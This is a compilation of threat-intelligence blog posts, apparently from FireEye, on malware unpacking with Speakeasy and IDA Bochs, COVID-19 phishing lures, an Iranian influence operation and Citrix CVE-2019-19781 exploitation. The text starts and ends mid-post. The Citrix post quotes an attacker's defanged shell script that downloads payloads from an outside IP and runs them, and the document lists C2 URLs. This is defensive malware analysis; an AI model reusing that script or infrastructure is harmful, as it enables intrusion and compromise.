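    for off in range(0, len(mem_bytes) - 3, 4):
        val = struct.unpack_from('<I', mem_bytes, off)[0]
        if val in symbols:
            hits[image_base + off] = symbols[val]
    return hits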

Putting It All Together

Writing a Speakeasy script to unpack a malware sample can be broken down into the following steps:

  1. Reverse engineer the unpacking stub to identify: 1) where the unpacked code will reside or where its memory is allocated, 2) where execution is transferred to the unpacked code, and 3) any problematic code that may introduce issues such as unsupported APIs, slow emulation, or anti-analysis checks.
  2. If necessary, set hooks to bypass problematic code.
  3. Set a hook to identify the virtual address and, optionally, the size of the unpacked binary.
  4. Set a hook to stop emulation at, or after, execution of the original entry point of the unpacked code.
  5. Collect virtual addresses of Windows APIs and reconstruct the PE’s import table.
  6. Fix the PE’s headers (if applicable) and write the bytes to a file for further analysis.
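
Tying the steps together, a skeleton unpacker built from the snippets in this post might look like the following sketch. The hook bodies are as defined earlier; which APIs to hook is packer-specific, so the choices below are assumptions.

import speakeasy

class MyUnpacker(speakeasy.Speakeasy):
    def __init__(self, output_path, config=None):
        super(MyUnpacker, self).__init__(config=config)
        self.output_path = output_path
        self.dump_addr = None
        self.dump_size = None

    def unpack(self, filename):
        self.module = self.load_module(filename)
        # Steps 2/3: bypass problem APIs and capture the dump address
        self.add_api_hook(self.getsyscolor_hook, 'user32', 'GetSysColor', argc=1)
        self.add_api_hook(self.virtualalloc_hook, 'kernel32', 'VirtualAlloc', argc=4)
        self.run_module(self.module)
        # Steps 5/6: dump memory and repair the PE for static analysis
        if self.dump_addr:
            mm = self.get_address_map(self.dump_addr)
            with open(self.output_path, 'wb') as up:
                up.write(self.mem_read(mm.get_base(), mm.get_size()))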

For an example of a script that unpacks UPX samples, check out the UPX unpacking script in the Speakeasy repository.

Conclusion

The Speakeasy framework provides an easy-to-use, flexible, and powerful programming interface that enables analysts to solve complex problems such as unpacking malware. Using Speakeasy to automate these solutions allows them to be performed at scale. I hope you enjoyed this introduction to automating the Speakeasy framework and are inspired to begin using it to implement your own malware analysis solutions!

Limited Shifts in the Cyber Threat Landscape Driven by COVID-19

8 April 2020 at 16:15

Though COVID-19 has had enormous effects on our society and economy, its effects on the cyber threat landscape remain limited. For the most part, the same actors we have always tracked are behaving in the same manner they did prior to the crisis. There are some new challenges, but they are perceptible, and we—and our customers—are prepared to continue this fight through this period of unprecedented change.

The significant shifts in the threat landscape we are currently tracking include:

  • The sudden major increase in a remote workforce has changed the nature and vulnerability of enterprise networks.
  • Threat actors are now leveraging COVID-19 and related topics in social engineering ploys.
  • We anticipate increased collection by cyber espionage actors seeking to gather intelligence on the crisis.
  • Healthcare operations, related manufacturing, logistics, and administration organizations, as well as government offices involved in responding to the crisis are increasingly critical and vulnerable to disruptive attacks such as ransomware.
  • Information operations actors have seized on the crisis to promote narratives primarily to domestic or near-abroad audiences.

Same Actors, New Content

The same threat actors and malware families that we observed prior to the crisis are largely pursuing the same objectives as before the crisis, using many of the same tools. They are simply now leveraging the crisis as a means of social engineering. This pattern of behavior is familiar. Threat actors have always capitalized on major events and crises to entice users. Many of the actors who are now using this approach have been tracked for years.

Ultimately, COVID-19 is being adopted broadly in social engineering approaches because it has widespread, generic appeal, and there is a genuine thirst for information on the subject that encourages users to take actions when they might otherwise have been circumspect. We have seen it used by several cyber criminal and cyber espionage actors, and in underground communities some actors have created tools to enable effective social engineering that exploits the coronavirus pandemic. Nonetheless, COVID-19 content is still used in only two percent of malicious emails.


For the time being, we do not believe this social engineering will be abating. In fact, it is likely to take many forms as changes in policy, economics, and other unforeseen consequences manifest. Recently we predicted a spike in stimulus-related social engineering, for example. Additionally, the FBI recently released a press release anticipating a rise in COVID-19 related Business Email Compromise (BEC) scams.

State Actors Likely Very Busy

Given that COVID-19 is undoubtedly the overwhelming concern of governments worldwide for the time being, we anticipate targeting of government, healthcare, biotech, and other sectors by cyber espionage actors. We have not yet observed an incident of cyber espionage targeting COVID-19 related information; however, it is often difficult to determine what information these actors are targeting. There has been at least one publicly reported case, which we have not independently confirmed.

We have seen state actors, such as those from Russia, China and North Korea, leverage COVID-19 related social engineering, but given wide interest in that subject, that does not necessarily indicate targeting of COVID-19 related information.

Threat to Healthcare

Though we have no reason to believe there is a sudden, elevated threat to healthcare, the criticality of these systems has probably never been greater, and thus the risk to this sector will be elevated throughout this crisis. The threat of disruption is especially disconcerting as it could affect the ability of these organizations to provide safe and timely care. This threat extends beyond hospitals to pharmaceutical companies, as well as manufacturing, administration and logistics organizations providing vital support. Additionally, many critical public health resources lie at the state and local level.

Though there is some anecdotal evidence suggesting some ransomware actors are avoiding healthcare targets, we do not expect that all actors will practice this restraint. Additionally, an attack on state and local governments, which have been a major target of ransomware actors, could have a disruptive effect on treatment and prevention efforts.

Remote Work

The sudden and unanticipated shift of many workers to work-from-home status represents an opportunity for threat actors. Organizations will be challenged to move quickly to ensure sufficient capacity and to keep security controls and policies in place. Disruptive situations can reduce morale and increase stress, leading to adverse behavior such as a greater willingness to open suspicious messages, and even an increased risk of insider threats. Distractions while working at home can lower vigilance in scrutinizing and avoiding suspicious content as workers struggle to balance work and home responsibilities at the same time. Furthermore, the rapid adoption of new platforms will undoubtedly lead to security mistakes and attract the attention of threat actors.

Secure remote access will likely rely on use of VPNs and user access permissions and authentication procedures intended to limit exposure of proprietary data. Hardware and infrastructure protection should include ensuring full disk encryption on enterprise devices, maintaining visibility on devices through an endpoint security tool, and maintaining regular software updates. 

For more on this issue, see our blog post on the risks associated with remote connectivity.

The Information Operations Threat

We have seen information operations actors promote narratives associated with COVID-19 to manipulate primarily domestic or near-abroad audiences. We observed accounts in Chinese-language networks operating in support of the People's Republic of China (PRC), some of which we previously identified to be promoting messaging pertaining to the Hong Kong protests, shift their focus to praising the PRC's response to the COVID-19 outbreak, criticizing the response of Hong Kong medical workers and the U.S. to the pandemic, and covertly promoting a conspiracy theory that the U.S. was responsible for the outbreak of the coronavirus in Wuhan.

We have also identified multiple information operations promoting COVID-19-related narratives that were aimed at Russian- and Ukrainian-speaking audiences, including some that we assess with high confidence are part of the broader suspected Russian influence campaign publicly referred to as "Secondary Infektion," as well as other suspected Russian activity. These operations have included leveraging a false hacktivist persona to spread the conspiracy theory that the U.S. developed the coronavirus in a weapons laboratory in Central Asia, taking advantage of physical protests in Ukraine to push the narrative that Ukrainians repatriated from Wuhan will infect the broader Ukrainian population, and claiming that the Ukrainian healthcare system is ill-equipped to deal with the pandemic. Other operations alleged that U.S. government or military personnel were responsible for outbreaks of the coronavirus in various countries including Lithuania and Ukraine, or insisted that U.S. personnel would contribute to the pandemic's spread if scheduled multilateral military exercises in the region were to continue as planned.

Outlook

It is clear that adversaries expect us to be distracted by these overwhelming events. The greatest cyber security challenge posed by COVID-19 may be our ability to stay focused on the threats that matter most. An honest assessment of the cyber security implications of the pandemic will be necessary to make efficient use of resources limited by the crisis itself.

For more information and resources that can help strengthen defenses, visit FireEye's "Managing Through Change and Crisis" site, which aggregates many resources to help organizations that are trying to navigate COVID-19 related security challenges.

Thinking Outside the Bochs: Code Grafting to Unpack Malware in Emulation

7 April 2020 at 16:00

This blog post continues the FLARE script series with a discussion of patching IDA Pro database files (IDBs) to interactively emulate code. While the fastest way to analyze or unpack malware is often to run it, malware won’t always successfully execute in a VM. I use IDA Pro’s Bochs integration in IDB mode to sidestep tedious debugging scenarios and get quick results. Bochs emulates the opcodes directly from your IDB in a Bochs VM with no OS.

Bochs IDB mode eliminates distractions like switching VMs, debugger setup, neutralizing anti-analysis measures, and navigating the program counter to the logic of interest. Alas, where there is no OS, there can be no loader or dynamic imports. Execution is constrained to opcodes found in the IDB. This precludes emulating routines that call imported string functions or memory allocators. Tom Bennett’s flare-emu ships with emulated versions of these, but for off-the-cuff analysis (especially when I don’t know if there will be a payoff), I prefer interactively examining registers and memory to adjust my tactics ad hoc.

What if I could bring my own imported functions to Bochs like flare-emu does? I’ve devised such a technique, and I call it code grafting. In this post I’ll discuss the particulars of statically linking stand-ins for common functions into an IDB to get more mileage out of Bochs. I’ll demonstrate using this on an EVILNEST sample to unpack and dump next-stage payloads from emulated memory. I’ll also show how I copied a tricky call sequence from one IDB to another IDB so I could keep the unpacking process all in a single Bochs debug session.

EVILNEST Scenario

My sample (MD5 hash 37F7F1F691D42DCAD6AE740E6D9CAB63, available on VirusTotal) was an EVILNEST variant that populates the stack with configuration data before calling an intermediate payload. Figure 1 shows this unusual call site.


Figure 1: Call site for intermediate payload

The code in Figure 1 executes in a remote thread within a hollowed-out iexplore.exe process; the malware uses anti-analysis tactics as well. I had the intermediate payload stage and wanted to unpack next-stage payloads without managing a multi-process debugging scenario with anti-analysis. I knew I could stub out a few function calls in the malware to run all of the relevant logic in Bochs. Here’s how I did it.

Code Carving

I needed opcodes for a few common functions to inject into my IDBs and emulate in Bochs. I built simple C implementations of selected functions and compiled them into one binary. Figure 2 shows some of these stand-ins.


Figure 2: Simple implementations of common functions

I compiled this and then used IDAPython code similar to Figure 3 to extract the function opcode bytes.


Figure 3: Function extraction
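
For readers who want to adapt this step, a minimal IDAPython sketch of the extraction logic might look like the following; the stand-in function names are illustrative, and the actual script in Figure 3 may differ in its details:

import idc
import ida_funcs

def get_function_opcodes(fva):
    # Read the raw opcode bytes spanning a function so they can later
    # be grafted into another IDB as a stub.
    f = ida_funcs.get_func(fva)
    return idc.get_bytes(f.start_ea, f.end_ea - f.start_ea)

# Dump each stand-in as a Python bytes literal for the opcode library.
for name in ('memcpy', 'strlen', 'malloc'):
    fva = idc.get_name_ea_simple(name)
    print('%s = %r' % (name, get_function_opcodes(fva)))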

I curated a library of function opcodes in an IDAPython script as shown in Figure 4. The nonstandard function opcodes at the bottom of the figure were hand-assembled as tersely as possible to generically return specific values and manipulate the stack (or not) in conformance with calling conventions.


Figure 4: Extracted function opcodes

On top of simple functions like memcpy, I implemented a memory allocator. The allocator referenced global state data, meaning I couldn’t just inject it into an IDB and expect it to work. I read the disassembly to find references to global operands and templatize them for use with Python’s format method. Figure 5 shows an example for malloc.


Figure 5: HeapAlloc template code
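
As a rough sketch of that templatization (the opcodes and field name below are hypothetical, chosen to illustrate the approach rather than reproduce the real allocator), the stub's hex string carries placeholders that are filled in once the data segment's address is known:

import struct

# Hypothetical bump allocator: references to its global state variable
# are format placeholders rather than hard-coded addresses.
MALLOC_TEMPLATE = (
    '558bec'         # push ebp; mov ebp, esp
    'a1{state}'      # mov eax, dword ptr [g_heap_next]
    '034508'         # add eax, [ebp+8]   ; advance by requested size
    'a3{state}'      # mov dword ptr [g_heap_next], eax
    '2b4508'         # sub eax, [ebp+8]   ; return the old pointer
    '5dc20400'       # pop ebp; retn 4
)

def render_malloc(state_va):
    # Substitute the little-endian VA of the allocator's state data.
    le_hex = struct.pack('<I', state_va).hex()
    return bytes.fromhex(MALLOC_TEMPLATE.format(state=le_hex))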

I organized the stubs by name as shown in Figure 6 both to call out functions I would need to patch, and to conveniently add more function stubs as I encounter use cases for them. The mangled name I specified as an alias for free is operator delete.


Figure 6: Function stubs and associated names

To inject these functions into the binary, I wrote code to find the next available segment of a given size. I avoided occupying low memory because Bochs places its loader segment below 0x10000. Adjacent to the code in my new segment, I included space for the data used by my memory allocator. Figure 7 shows the result of patching these functions and data into the IDB and naming each location (stub functions are prefixed with stub_).


Figure 7: Data and code injected into IDB
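
A simplified sketch of the injection step follows; the real script searches for the next unoccupied region, whereas this version assumes a fixed, suitably high address:

import ida_bytes
import ida_segment

def add_graft_segment(size, start=0x10000000, name='GRAFT'):
    # Carve out a new 32-bit code segment well above the loader
    # segment that Bochs places below 0x10000.
    seg = ida_segment.segment_t()
    seg.start_ea = start
    seg.end_ea = start + size
    seg.bitness = 1  # 32-bit
    ida_segment.add_segm_ex(seg, name, 'CODE', ida_segment.ADDSEG_NOSREG)
    return start

def graft(ea, opcodes):
    # Patch the stub opcodes into the IDB at the chosen address.
    ida_bytes.patch_bytes(ea, opcodes)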

The script then iterates all the relevant calls in the binary and patches them with calls to their stub implementations in the newly added segment. As shown in Figure 8, IDAPython’s Assemble function saved the effort of calculating the offset for the call operand manually. Note that the Assemble function worked well here, but for bigger tasks, Hex-Rays recommends a dedicated assembler such as Keystone Engine and its Keypatch plugin for IDA Pro.


Figure 8: Abbreviated routine for assembling a call instruction and patching a call site to an import
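
In essence, the patching step boils down to something like the sketch below; it glosses over details the real script must handle, such as padding out a six-byte indirect call when the assembled near call is only five bytes:

import ida_bytes
import idautils

def patch_call(call_ea, stub_ea):
    # Let IDA's assembler compute the relative operand for us.
    ok, code = idautils.Assemble(call_ea, 'call 0x%X' % stub_ea)
    assert ok, code
    ida_bytes.patch_bytes(call_ea, code)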

The Code Grafting script updated all the relevant call sites to resemble Figure 9, with the target functions being replaced by calls to the stub_ implementations injected earlier. This prevented Bochs in IDB mode from getting derailed when hitting these call sites, because the call operands now pointed to valid code inside the IDB.


Figure 9: Patched operator new() call site

Dealing with EVILNEST

The debug scenario for the dropper was slightly inconvenient, and at the same time it set up a very unusual call site for the payload entry point. I used Bochs to execute the dropper until it placed the configuration data on the stack, and then I used IDAPython’s idc.get_bytes function to extract the resulting stack data. I wrote IDAPython script code to iterate the stack data and assemble push instructions into the payload IDB leading up to a call instruction pointing to the DLL’s export. This allowed me to debug the unpacking process from Bochs within a single session.
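
A sketch of that synthesis step (names and addresses are illustrative):

import ida_bytes
import idautils
import idc

def synthesize_call_site(build_ea, stack_ea, n_dwords, entry_ea):
    # Re-create the dropper's unusual call site in the payload IDB:
    # push the configuration dwords captured from the Bochs stack in
    # their original order, then call the DLL export.
    ea = build_ea
    for i in reversed(range(n_dwords)):  # highest address was pushed first
        val = int.from_bytes(idc.get_bytes(stack_ea + 4 * i, 4), 'little')
        ok, code = idautils.Assemble(ea, 'push 0x%X' % val)
        assert ok, code
        ida_bytes.patch_bytes(ea, code)
        ea += len(code)
    ok, code = idautils.Assemble(ea, 'call 0x%X' % entry_ea)
    assert ok, code
    ida_bytes.patch_bytes(ea, code)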

I clicked on the beginning of my synthesized call site and hit F4 to run it in Bochs. I was greeted with the warning in Figure 10 indicating that the patched IDB would not match the depictions made by the debugger (which is untrue in the case of Bochs IDB mode). Bochs faithfully executed my injected opcodes producing exactly the desired result.


Figure 10: Patch warning

I watched carefully as the instruction pointer approached and passed the IsDebuggerPresent check. Because of the stub I injected (stub_IsDebuggerPresent), it passed the check returning zero as shown in Figure 11.


Figure 11: Passing up IsDebuggerPresent

I allowed the program counter to advance to address 0x1A1538, just beyond the unpacking routine. Figure 12 shows the register state at this point; EAX holds a value handed out by my fake heap allocator, which I was about to visit.


Figure 12: Running to the end of the unpacker and preparing to view the result

Figure 13 shows that there was indeed an IMAGE_DOS_SIGNATURE (“MZ”) at this location. I used idc.get_bytes() to dump the unpacked binary from the fake heap location and saved it for analysis.


Figure 13: Dumping the unpacked binary
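
The dump itself is a one-liner once the allocation's address and size are known (the values below are placeholders for what the Bochs session showed):

import idc

fake_heap_va = 0x00830000   # hypothetical value observed in EAX
unpacked_size = 0x1A000     # hypothetical size of the unpacked image

with open('unpacked_stage.bin', 'wb') as f:
    f.write(idc.get_bytes(fake_heap_va, unpacked_size))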

Through Bochs IDB mode, I was also able to use the interactive debugger interface of IDA Pro to experiment with manipulating execution and traversing a different branch to unpack another payload for this malware as well.

Conclusion

Although dynamic analysis is sometimes the fastest road, setting it up and navigating minutia detract from my focus, so I’ve developed an eye for routines that I can likely emulate in Bochs to dodge those distractions while still getting answers. Injecting code into an IDB broadens the set of functions that I can do this with, letting me get more out of Bochs. This in turn lets me do more on-the-fly experimentation, one-off string decodes, or validation of hypotheses before attacking something at scale. It also allows me to experiment dynamically with samples that won’t load correctly anyway, such as unpacked code with damaged or incorrect PE headers.

I’ve shared the Code Grafting tools as part of the flare-ida GitHub repository. To use this for your own analyses:

  1. In IDA Pro’s IDAPython prompt, run code_grafter.py or import it as a module.
  2. Instantiate a CodeGrafter object and invoke its graftCodeToIdb() method:
    • CodeGrafter().graftCodeToIdb()
  3. Use Bochs in IDB mode to conveniently execute your modified sample and experiment away!

This post makes it clear just how far I’ll go to avoid breaking eye contact with IDA. If you’re a fan of using Bochs with IDA too, then this is my gift to you. Enjoy!

Social Engineering Based on Stimulus Bill and COVID-19 Financial Compensation Schemes Expected to Grow in Coming Weeks

Given the community interest and media coverage surrounding the economic stimulus bill currently being considered by the United States House of Representatives, we anticipate attackers will increasingly leverage lures tailored to the new stimulus bill and related recovery efforts such as stimulus checks, unemployment compensation and small business loans. Although campaigns employing themes relevant to these matters are only beginning to be adopted by threat actors, we expect future campaigns—primarily those perpetrated by financially motivated threat actors—to incorporate these themes in proportion to the media’s coverage of these topics.

Threat actors with varying motivations are actively exploiting the current pandemic and public fear of the coronavirus and COVID-19. This is consistent with our expectations; malicious actors are typically quick to adapt their social engineering lures to exploit major flashpoints along with other recurrent events (e.g. holidays, Olympics). Security researchers at FireEye and in the broader community have already begun to identify and report on COVID-19 themed campaigns with grant-, payment-, or economic recovery-themed emails and attachments.

Example Malware Distribution Campaign

On March 18, individuals at corporations across a broad set of industries and geographies received emails with the subject line “COVID-19 Payment” intended to distribute the SILENTNIGHT banking malware (also referred to by others as Zloader). Despite the campaign’s broad distribution, a plurality of associated messages were sent to organizations based in Canada. Interestingly, although the content of these emails was somewhat generic, they were sometimes customized to reference a payment made in currency relevant to the recipient’s geography and contextually relevant government officials (Figure 1 and Figure 2). These emails were sent from a large pool of different @gmx.com email addresses and had password-protected Microsoft Word document attachments using the file name “COVID 19 Relief.doc” (Figure 3). The emails appear to be auto-generated and follow the format <name>.<name><SevenNumberString>@gmx.com. When these documents were opened and macros were enabled, they would drop and execute a .JSE script crafted to download and execute an instance of SILENTNIGHT from http://209.141.54[.]161/crypt18.dll.

An analyzed sample of SILENTNIGHT downloaded from this URL had an MD5 hash of 9e616a1757cf1d40689f34d867dd742e, employed the RC4 key 'q23Cud3xsNf3', and was associated with the SILENTNIGHT botnet 'PLSPAM'. This botnet has been seen loading configuration files containing primarily U.S. and Canadian financial institution webinject targets. Furthermore, this sample was configured to connect to the following controller infrastructure:

  • http://marchadvertisingnetwork4[.]com/post.php
  • http://marchadvertisingnetwork5[.]com/post.php
  • http://marchadvertisingnetwork6[.]com/post.php
  • http://marchadvertisingnetwork7[.]com/post.php
  • http://marchadvertisingnetwork8[.]com/post.php
  • http://marchadvertisingnetwork9[.]com/post.php
  • http://marchadvertisingnetwork10[.]com/post.php


Figure 1: Example lure using CAD


Figure 2: Example lure using AUD


Figure 3: Malicious Word document

Example Phishing Campaign

Individuals at financial services organizations in the United States were sent emails with the subject line “Internal Guidance for Businesses Grant and loans in response to respond to COVID-19” (Figure 4). These emails had OpenDocument Presentation (.ODP) format attachments that, when opened in Microsoft PowerPoint or OpenOffice Impress, display a U.S. Small Business Administration (SBA) themed message (Figure 5) and an in-line link that redirects to an Office 365 phishing kit (Figure 6) hosted at https://tyuy56df-kind-giraffe-ok.mybluemix[.]net/.


Figure 4: Email lure referencing business grants and loans


Figure 5: SBA-themed message


Figure 6: Office 365 phishing page

Implications

Malicious actors have always exploited users’ sense of urgency, fear, goodwill and mistrust to enhance their operations. The threat actors exploiting this crisis are not new; they are simply taking advantage of a particularly overtaxed target set that is urgently seeking new information. Users who are aware of this dynamic, and who approach any new information with cautious skepticism, will be especially prepared to meet this challenge.

"Distinguished Impersonator" Information Operation That Previously Impersonated U.S. Politicians and Journalists on Social Media Leverages Fabricated U.S. Liberal Personas to Promote Iranian Interests

12 February 2020 at 12:30

In May 2019, FireEye Threat Intelligence published a blog post exposing a network of English-language social media accounts that engaged in inauthentic behavior and misrepresentation that we assessed with low confidence was organized in support of Iranian political interests. Personas in that network impersonated candidates for U.S. House of Representatives seats in 2018 and leveraged fabricated journalist personas to solicit various individuals, including real journalists and politicians, for interviews intended to bolster desired political narratives. Since the release of that blog post, we have continued to track activity that we believe to be part of that broader operation, reporting our findings to our intelligence customers using the moniker “Distinguished Impersonator.”

Today, Facebook took action against a set of eleven accounts on the Facebook and Instagram platforms that they shared with us and, upon our independent review, we assessed were related to the broader Distinguished Impersonator activity set we’ve been tracking. We separately identified a larger set of just under 40 related accounts active on Twitter against which Twitter has also taken recent enforcement action. In this blog post, we provide insights into the recent activity and behavior of some of the personas in the Distinguished Impersonator network, in order to exemplify the tactics information operations actors are employing in their attempts to surreptitiously amplify narratives and shape political attitudes.          

Activity Overview

Personas in the Distinguished Impersonator network have continued to engage in activity similar to that we previously reported on publicly in May 2019, including social media messaging directed at politicians and media outlets; soliciting prominent individuals including academics, journalists, and activists for “media” interviews; and posting what appear to be videoclips of interviews of unknown provenance conducted with such individuals to social media. The network has also leveraged authentic media content to promote desired political narratives, including the dissemination of news articles and videoclips from Western mainstream media outlets that happen to align with Iranian interests, and has amplified the commentary of real individuals on social media.

Outside of impersonating prominent individuals such as journalists, other personas in the network have primarily posed as U.S. liberals, amplifying authentic content from other social media users broadly in line with that proclaimed political leaning, as well as material more directly in line with Iranian political interests, such as videoclips of a friendly meeting between U.S. President Trump and Crown Prince of Saudi Arabia Mohammad Bin Salman accompanied by pro-U.S. Democrat commentary, videoclips of U.S. Democratic presidential candidates discussing Saudi Arabia's role in the conflict in Yemen, and other anti-Saudi, anti-Israeli, and anti-Trump messaging. Some of this messaging has been directed at the social media accounts of U.S. politicians and media outlets (Figure 1).


Figure 1: Twitter accounts in the Distinguished Impersonator network posting anti-Israeli, anti-Saudi, and anti-Trump content

We observed direct overlap between six of the personas operating on Facebook platforms and those operating on Twitter. In one example of such overlap, the “Ryan Jensen” persona posted to both Twitter and Instagram a videoclip showing antiwar protests in the U.S. following the killing of Qasem Soleimani, commander of the Islamic Revolutionary Guards Corps’ Quds Force (IRGC-QF) by a U.S. airstrike in Baghdad in January 2020 (Figure 2). Notably, though the strike motivated some limited activity by personas in the network, the Distinguished Impersonator operation has been active since long before that incident.


Figure 2: Posts by the “Ryan Jensen” persona on Twitter and Instagram disseminating a videoclip of antiwar protests in the U.S. following the killing of Qasem Soleimani

Accounts Engaged in Concerted Replies to Influential Individuals on Twitter, Posed as Journalists and Solicited Prominent Individuals for “Media” Interviews

Personas on Twitter that we assess to be a part of the Distinguished Impersonator operation engaged in concerted replies to tweets by influential individuals and organizations, including members of the U.S. Congress and other prominent political figures, journalists, and media outlets. The personas responded to tweets with specific narratives aligned with Iranian interests, often using identical hashtags. The personas sometimes also responded with content unrelated to the tweet they were replying to, again with messaging aligned with Iranian interests. For example, a tweet regarding a NASA mission received replies from personas in the network pertaining to Iran’s seizure of a British oil tanker in July 2019. Other topics the personas addressed included U.S.-imposed sanctions on Iran and U.S. President Trump’s impeachment (Figure 3). While it is possible that the personas may have conducted such activity in the hope of eliciting responses from the specific individuals and organizations they were replying to, the multiple instances of personas responding to seemingly random tweets with unrelated political content could also indicate an intent to reach the broader Twitter audiences following those prominent accounts.


Figure 3: Twitter accounts addressing U.S.-imposed sanctions on Iran (left) and the Trump impeachment (right)

Instagram accounts that we assess to be part of the Distinguished Impersonator operation subsequently highlighted this Twitter activity by posting screen recordings of an unknown individual(s) scrolling through the responses by the personas and authentic Twitter users to prominent figures’ tweets. The Instagram account @ryanjensen7722, for example, posted a video scrolling through replies to a tweet by U.S. Senator Cory Gardner commenting on “censorship and oppression.” The video included a reply posted by @EmilyAn1996, a Twitter account we have assessed to be part of the operation, discussing potential evidence surrounding President Trump’s impeachment trial.


Figure 4: Screenshot of video posted by @ryanjensen7722 on Instagram scrolling through Twitter replies to a tweet by U.S. Senator Cory Gardner

We also observed at least two personas posing as journalists working at legitimate U.S. media outlets openly solicit prominent individuals via Twitter, including Western academics, activists, journalists, and political advisors, for interviews (Figure 5). These individuals included academic figures from organizations such as the Washington Institute for Near East Policy and the Foreign Policy Research Institute, as well as well-known U.S. conservatives opposed to U.S. President Trump and a British MP. The personas solicited the individuals’ opinions regarding topics relevant to Iran’s political interests, such as Trump’s 2020 presidential campaign, the Trump administration’s relationship with Saudi Arabia, Trump’s “deal of the century,” referring to a peace proposal regarding the Israeli-Palestinian conflict authored by the Trump administration, and a tweet by President Trump regarding former UK Prime Minister Theresa May.


Figure 5: The “James Walker” persona openly soliciting interviews from academics and journalists on Twitter

Twitter Personas Posted Opinion Polls To Solicit Views on Topics Relevant to Iranian Political Interests

Some of the personas on Twitter also posted opinion polls to solicit other users’ views on political topics, possibly for the purpose of helping to build a larger follower base through engagement. One account, @CavenessJim, posed the question: “Do you believe in Trump’s foreign policies especially what he wants to do for Israel which is called ‘the deal of the century’?” (The poll provided two options: “Yes, I do.” and “No, he cares about himself.” Of the 2,241 votes received, 99% of participants voted for the latter option, though we note that we have no visibility into the authenticity of those “voters”.) Another account, @AshleyJones524, responded to a tweet by U.S. Senator Lindsey Graham by posting a poll asking if the senator was “Trump’s lapdog,” tagging seven prominent U.S. politicians and one comedian in the post; all 24 respondents to the poll voted in the affirmative. As with the Instagram accounts’ showcasing of replies to the tweets of prominent individuals, Instagram accounts in the network also highlighted polls posted by the personas on Twitter (Figure 6).


Figure 6: Twitter account @CavenessJim posts Twitter poll (left); Instagram account @ryanjensen7722 posts video highlighting @CavenessJim's Twitter poll (right)

Videoclips of Interviews with U.S., U.K., and Israeli Individuals Posted on Iran-Based Media Outlet Tehran Times

Similar to the personas we reported on in May 2019, some of the more recently active personas posted videoclips on Facebook, Instagram, and Twitter of interviews with U.S., UK, and Israeli individuals including professors, politicians, and activists expressing views on topics aligned with Iranian political interests (Figure 7). We have thus far been unable to determine the provenance of these interviews, and note that, unlike some of the previous cases we reported on in 2019, the personas in this more recent iteration of activity did not themselves proclaim to have conducted the interviews they promoted on social media. The videoclips highlighted the interviewees’ views on issues such as U.S. foreign policy in the Middle East and U.S. relations with its political allies. Notably, we observed that at least some of the videoclips that were posted by the personas to social media have also appeared on the website of the Iranian English-language media outlet Tehran Times, both prior to and following the personas' social media posts. In other instances, Tehran Times published videoclips that appeared to be different segments of the same interviews that were posted by Distinguished Impersonator personas. Tehran Times is owned by the Islamic Propagation Organization, an entity that falls under the supervision of the Iranian Supreme Leader Ali Khamenei.


Figure 7: Facebook and Instagram accounts in the network posting videoclips of interviews with an activist and a professor

Conclusion

The activity we’ve detailed here does not, in our assessment, constitute a new activity set, but rather a continuation of an ongoing operation we believe is being conducted in support of Iranian political interests that we’ve been tracking since last year. It illustrates that the actors behind this operation continue to explore elaborate methods for leveraging the authentic political commentary of real individuals to furtively promote Iranian political interests online. The continued impersonation of journalists and the amplification of politically-themed interviews of prominent individuals also provide additional examples of what we have long referred to internally as the “media-IO nexus”, whereby actors engaging in online information operations actively leverage the credibility of the legitimate media environment to mask their activities, whether that be through the use of inauthentic news sites masquerading as legitimate media entities, deceiving legitimate media entities in order to promote desired political narratives, defacing media outlets’ websites to disseminate disinformation, spoofing legitimate media websites, or, as in this case, attempting to solicit commentary likely perceived as expedient to the actors’ political goals by adopting fake media personas.

Nice Try: 501 (Ransomware) Not Implemented

24 January 2020 at 17:00

An Ever-Evolving Threat

Since January 10, 2020, FireEye has tracked extensive global exploitation of CVE-2019-19781, which continues to impact Citrix ADC and Gateway instances that are unpatched or do not have mitigations applied. We previously reported on attackers’ swift attempts to exploit this vulnerability and the post-compromise deployment of the previously unseen NOTROBIN malware family by one threat actor. FireEye continues to actively track multiple clusters of activity associated with exploitation of this vulnerability, primarily based on how attackers interact with vulnerable Citrix ADC and Gateway instances after identification.

While most of the CVE-2019-19781 exploitation activity we’ve observed to this point has led to the deployment of coin miners or most commonly NOTROBIN, recent compromises suggest that this vulnerability is also being exploited to deploy ransomware. If your organization is attempting to assess whether there is evidence of compromise related to exploitation of CVE-2019-19781, we highly encourage you to use the IOC Scanner co-published by FireEye and Citrix, which detects the activity described in this post.

Between January 16 and 17, 2020, FireEye Managed Defense detected the IP address 45[.]120[.]53[.]214 attempting to exploit CVE-2019-19781 at dozens of FireEye clients. When successfully exploited, we observed impacted systems executing the cURL command to download a shell script with the file name ld.sh from 45[.]120[.]53[.]214 (Figure 1). In some cases this same shell script was instead downloaded from hxxp://198.44.227[.]126:81/citrix/ld.sh.


Figure 1: Snippet of ld.sh, downloaded from 45.120.53.214

The shell script, provided in Figure 2, searches for the python2 binary (Note: Python is only pre-installed on Citrix Gateway 12.x and 13.x systems) and downloads two additional files into a temporary directory: piz.Lan, an XOR-encoded data blob, and de.py, a Python script. The script then changes permissions and executes de.py, which subsequently decodes and decompresses piz.Lan. Finally, the script cleans up the initial staging files and executes scan.py, an additional script we will cover in more detail later in the post.

#!/bin/sh
rm $0
if [ ! -f "/var/python/bin/python2" ]; then
echo 'Exit'
exit
fi

mkdir /tmp/rAgn
cd /tmp/rAgn

curl hxxp://45[.]120[.]53[.]214/piz.Lan -o piz.Lan
sleep 1
curl hxxp://45[.]120[.]53[.]214/de -o de.py
chmod 777 de.py
/var/python/bin/python2 de.py

rm de.py
rm piz.Lan
rm .new.zip
cd httpd
/var/python/bin/python2 scan.py -n 50 -N 40 &

Figure 2: Contents of ld.sh, a shell-script to download additional tools to the compromised system
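
We did not reproduce de.py verbatim, but its effect can be approximated with a few lines of Python; the single-byte XOR key and extraction directory here are placeholders standing in for the values recovered during analysis:

import zipfile

KEY = 0x41  # placeholder; the real key was recovered from de.py

with open('piz.Lan', 'rb') as f:
    blob = f.read()

# XOR-decode the blob into a ZIP archive, then extract its contents.
with open('.new.zip', 'wb') as f:
    f.write(bytes(b ^ KEY for b in blob))

zipfile.ZipFile('.new.zip').extractall('httpd')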

piz.Lan -> .new.zip

Armed with the information gathered from de.py, we turned our attention to decoding and decompressing “.new.zip” (MD5: 0caf9be8fd7ba5b605b7a7b315ef17a0). Inside, we recovered five files, represented in Table 1:

Filename              | Functionality         | MD5
----------------------|-----------------------|---------------------------------
x86.dll               | 32-bit Downloader     | 9aa67d856e584b4eefc4791d2634476a
